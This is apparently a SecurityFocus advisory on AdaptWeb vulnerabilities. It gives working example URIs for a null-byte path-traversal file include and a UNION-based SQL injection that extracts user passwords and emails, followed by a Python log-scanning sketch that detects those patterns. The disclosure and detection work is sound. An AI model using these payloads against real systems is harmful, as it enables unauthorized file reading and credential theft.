AdaptWeb Local File Include and SQL Injection Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

Local file include:
http://www.example.com/[path]/index.php?newlang=../../../../../../BOOTSECT.BAK%00

SQL injection:
http://www.example.com/[path]/a_index.php?opcao=TopicosCadastro1&CodigoDisciplina=null+union+all+select+concat_ws(0x3a,senha_usuario,email_usuario)+from+usuario+where+id_usuario=1--&numtopico=1
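
For detection, the two request patterns above can be matched in web server access logs. The following Python sketch is an added example, not part of the original advisory or of AdaptWeb. The log lines are constructed, the /adaptweb/ path stands in for [path], and the "expected" formats for newlang and CodigoDisciplina are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log request lines (not taken from a real server).
SAMPLE_REQUESTS = [
    "GET /adaptweb/index.php?newlang=pt_BR HTTP/1.1",
    "GET /adaptweb/index.php?newlang=../../../../../../BOOTSECT.BAK%00 HTTP/1.1",
    "GET /adaptweb/a_index.php?opcao=TopicosCadastro1&CodigoDisciplina=12&numtopico=1 HTTP/1.1",
    "GET /adaptweb/a_index.php?opcao=TopicosCadastro1&CodigoDisciplina=null+union+all+select+concat_ws(0x3a,senha_usuario,email_usuario)+from+usuario+where+id_usuario=1--&numtopico=1 HTTP/1.1",
]

# Assumption: legitimate values are a short locale code and a numeric ID.
LANG_OK = re.compile(r"[A-Za-z]{2}(?:[_-][A-Za-z]{2})?")
ID_OK = re.compile(r"\d+")

def classify(request_line):
    """Return a list of findings for one 'METHOD URI PROTO' request line."""
    try:
        _method, uri, _proto = request_line.split(" ", 2)
    except ValueError:
        return ["malformed-request-line"]
    parts = urlsplit(uri)
    script = parts.path.rsplit("/", 1)[-1].lower()
    findings = []
    # parse_qsl percent-decodes values and turns '+' into a space.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if script == "index.php" and name == "newlang":
            if "\x00" in value:
                findings.append("newlang:null-byte")
            if ".." in value or "/" in value or "\\" in value:
                findings.append("newlang:path-traversal")
            elif not LANG_OK.fullmatch(value):
                findings.append("newlang:unexpected-format")
        elif script == "a_index.php" and name == "CodigoDisciplina":
            if not ID_OK.fullmatch(value):
                findings.append("CodigoDisciplina:non-numeric")
            if re.search(r"\bunion\b.*\bselect\b", value, re.I | re.S):
                findings.append("CodigoDisciplina:union-select")
    return findings

def scan(lines):
    """Map each suspicious request line to its findings."""
    return {l: f for l in lines if (f := classify(l))}

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_REQUESTS).items():
        print(hits, line[:80])
```

Values are checked after percent-decoding, so encoded variants of the same characters are flagged as well.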


 

Copyright 2010, SecurityFocus